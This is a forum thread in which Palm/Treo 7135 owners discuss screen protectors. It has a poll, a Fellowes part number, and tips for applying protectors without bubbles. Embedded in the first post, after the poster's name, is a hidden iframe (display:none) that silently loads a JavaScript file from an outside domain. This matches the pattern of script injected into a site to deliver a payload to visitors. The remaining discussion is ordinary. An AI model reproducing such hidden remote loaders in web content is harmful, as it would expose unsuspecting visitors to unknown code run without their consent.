View Poll Results: Screen Protector

Voters
26. This poll is closed
  • Screen protected

17 65.38%
  • Screen not protected - no scratches

8 30.77%
  • Screen not protected - scratches (wish they had protection)

1 3.85%
+ Reply to Thread

Screen Protector or Not?

This may have been discussed before, but I have screen protectors on my 7135 and am wondering if I am paranoid. Does anyone not use protection (on their screens)? and if Not - are there a lot of scratches on your screens?

Thank you.

Drew<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    The one who dies with the most toys WINS :-)

Administrator
    definitely use screen protectors!

once you damage your expensive touch sensitive screen, the functionality of it will diminish very quickly. and the screens are not cheap to replace.

How can you call it paranoia! Screen protectors are cheap insurance for a $500 phone! Why just the other day I found my two year old daughter and got my phone and was use a small pen screw driver as a stylus. My SG protectors were covered with pits, but when I peeled the protectors back the screen was scratch free! Kid tested!
    mg

the graffitti area needs protection. removable scotch tape is nice... it makes some noise while writing, though.

Fellowes makes WriteRights for the 7135, if you can find them. I bought a set directly from Fellowes via a customer service rep. They don't sell them from the web store. Why? I don't know and couldn't get a straight answer about it from anyone at Fellowes. According to Fellowes, anyone who carries their WriteRight line should be able to get them in stock. You have to tell them that you don't want the ones for the 6035. Keep telling them you want the ones for the 7135.

The part # for Fellowes is: 90183

The nice thing is that each sheet (12 to a pack) has a protector for both the screen and the graffiti area.

Erick

Originally posted by dwdod
    Hey Beryl,

Can you offer suggestions for getting a StrongEngineering screen protector onto the screen free from all those distracting air bubbles???
    I took a plastic grocery store "mvp" type card, cut part of the long side off (to make the card as wide as the phone screen) and slooooooooowly pushed the screen protector on.
    Please visit my picture site: Robert-O-Rama :)

My method is similar to Roberts but I use the corner of a regular credit card. I could probably do the same thing with a stylus but I'm used to using a credit card on my Palm devices.

Apply the top tab and fit the protector to the first millimeter or so of the top of the screen.

Starting at the top, slide the corner of the card from side to side and downward at the place where the protector meets the backing. This causes the paper peel away as you reach the bottom of the screen.

If you see a bubble in the process, just lift it to the bubble and start again.

The horizonal streak goes away in a day.

Originally posted by Beryl
    Starting at the top, slide the corner of the card from side to side and downward at the place where the protector meets the backing. This causes the paper peel away as you reach the bottom of the screen.
    I start the process from the bottom of the screen!
    Please visit my picture site: Robert-O-Rama :)